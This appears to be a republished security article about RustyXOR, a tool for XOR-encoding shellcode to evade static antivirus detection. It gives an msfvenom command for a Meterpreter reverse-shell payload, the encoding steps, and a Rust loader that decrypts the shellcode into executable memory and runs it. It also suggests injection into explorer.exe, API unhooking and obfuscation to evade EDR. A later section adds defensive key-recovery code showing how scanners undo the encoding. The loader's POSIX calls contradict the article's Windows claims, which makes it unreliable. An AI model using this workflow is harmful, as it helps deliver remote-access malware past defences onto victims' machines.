RustyXOR is a custom shellcode encoder designed to bypass static antivirus detection by leveraging XOR encryption. Unlike AES and other encryption algorithms, which may leave traces via WinAPI calls, XOR needs no cryptographic API and is therefore more efficient and stealthier. This tool has been tested with custom Rust loaders and msfvenom shellcodes, successfully evading Windows Defender in local setups.
GitHub Repo: RustyXOR
AVScan Results: Scan Report
You Should Know: Practical Implementation of RustyXOR
1. Generating Shellcode with msfvenom
First, generate a raw shellcode payload using `msfvenom`:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.bin
2. Encoding Shellcode with RustyXOR
Clone the RustyXOR repository and encode the payload:
git clone https://github.com/[USER]/RustyXOR.git
cd RustyXOR
cargo build --release
./target/release/rustyxor -i payload.bin -o encoded_payload.bin -k "MySecretKey"
3. Loading Encoded Shellcode in Rust
Use a Rust loader to execute the encoded shellcode:
// Requires the `libc` crate as a dependency. Note that mmap/MAP_ANON are POSIX
// calls, so this loader as written builds on Linux/macOS rather than Windows.
use std::fs::File;
use std::io::Read;

fn main() {
    // Read the XOR-encoded payload produced by rustyxor
    let mut file = File::open("encoded_payload.bin").unwrap();
    let mut buffer = Vec::new();
    file.read_to_end(&mut buffer).unwrap();

    // XOR Decryption Routine: the same repeating key used at encode time
    let key = b"MySecretKey";
    let decrypted: Vec<u8> = buffer.iter().enumerate()
        .map(|(i, &x)| x ^ key[i % key.len()])
        .collect();

    // Execute Shellcode: map an RWX region, copy the bytes in, call it
    let exec = unsafe {
        let mem = libc::mmap(
            std::ptr::null_mut(),
            decrypted.len(),
            libc::PROT_READ | libc::PROT_WRITE | libc::PROT_EXEC,
            libc::MAP_ANON | libc::MAP_PRIVATE,
            -1,
            0,
        );
        std::ptr::copy_nonoverlapping(decrypted.as_ptr(), mem as *mut u8, decrypted.len());
        std::mem::transmute::<_, fn()>(mem)
    };
    exec();
}
4. Bypassing AV with Process Injection
Use process hollowing or DLL injection to evade runtime detection:
# Process Hollowing Example (C++/Rust)
# Inject into a benign process like explorer.exe
5. Verifying Stealth with Sysinternals
Check for suspicious memory allocations using `Process Explorer` or Process Hacker.
What Undercode Says
RustyXOR demonstrates how simple XOR encryption can effectively bypass static AV detection. However, modern EDR solutions may still catch runtime behavior. Combining XOR with:
– Process Injection (CreateRemoteThread, NtCreateThreadEx)
– API Unhooking (Direct syscalls via syswhispers3)
– Obfuscation (LLVM-based obfuscators like OLLVM)
strengthens evasion. Always test in isolated environments before real engagements.
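The caveat worth making concrete here is that repeating-key XOR is obfuscation, not encryption: a shellcode blob is dominated by null bytes, so the key (and its length) can be recovered from the encoded file alone, which is exactly what static scanners and analyst tools do before signature matching. The following is an added example, not RustyXOR's code; the "shellcode" bytes are a constructed stand-in and the key is the one used on this page.

```rust
use std::collections::HashMap;

/// Repeating-key XOR; the same function encodes and decodes.
pub fn xor_repeating(data: &[u8], key: &[u8]) -> Vec<u8> {
    data.iter().enumerate().map(|(i, &b)| b ^ key[i % key.len()]).collect()
}

/// Constructed stand-in for a raw shellcode blob: a short prologue, two strings and
/// zero padding, mimicking the null-heavy byte distribution of real position-independent code.
pub fn sample_plaintext() -> Vec<u8> {
    let mut p = vec![0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50];
    p.extend_from_slice(b"calc.exe\0ws2_32\0");
    p.extend(std::iter::repeat(0u8).take(192));
    p
}

/// Score a candidate key length: fraction of byte pairs at distance `len` that are equal.
/// At the true length (and its multiples) the key cancels out, so equal plaintext bytes
/// (mostly nulls) appear as equal ciphertext bytes.
pub fn key_len_score(enc: &[u8], len: usize) -> f64 {
    if len >= enc.len() { return 0.0; }
    let pairs = enc.len() - len;
    let equal = (0..pairs).filter(|&i| enc[i] == enc[i + len]).count();
    equal as f64 / pairs as f64
}

/// Smallest candidate length scoring within 90% of the best, since multiples of the
/// true length score about the same as the true length itself.
pub fn guess_key_len(enc: &[u8], max_len: usize) -> usize {
    let best = (1..=max_len).map(|l| key_len_score(enc, l)).fold(0.0, f64::max);
    (1..=max_len).find(|&l| key_len_score(enc, l) >= 0.9 * best).unwrap_or(1)
}

/// Recover the key: at each key position the most frequent ciphertext byte is
/// 0x00 XOR key byte, because 0x00 is the most frequent plaintext byte.
pub fn recover_key(enc: &[u8], key_len: usize) -> Vec<u8> {
    (0..key_len).map(|j| {
        let mut counts: HashMap<u8, usize> = HashMap::new();
        for &b in enc.iter().skip(j).step_by(key_len) { *counts.entry(b).or_insert(0) += 1; }
        // Tie-break on the byte value so the result is deterministic
        counts.into_iter().max_by_key(|&(b, n)| (n, std::cmp::Reverse(b))).map(|(b, _)| b).unwrap_or(0)
    }).collect()
}

fn main() {
    let enc = xor_repeating(&sample_plaintext(), b"MySecretKey");
    let len = guess_key_len(&enc, 32);
    let recovered = recover_key(&enc, len);
    println!("key length {}, key {:?}", len, String::from_utf8_lossy(&recovered));
    assert_eq!(xor_repeating(&enc, &recovered), sample_plaintext()); // decoded blob is scannable again
}
```

The decoded output is the original payload, so any static signature that matched the raw msfvenom blob matches again after this step.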
Expected Output:
A functional Rust-based shellcode encoder/decoder that bypasses static detection while maintaining execution stability.
Reported By: Aidenmonish Rust – Hackers Feeds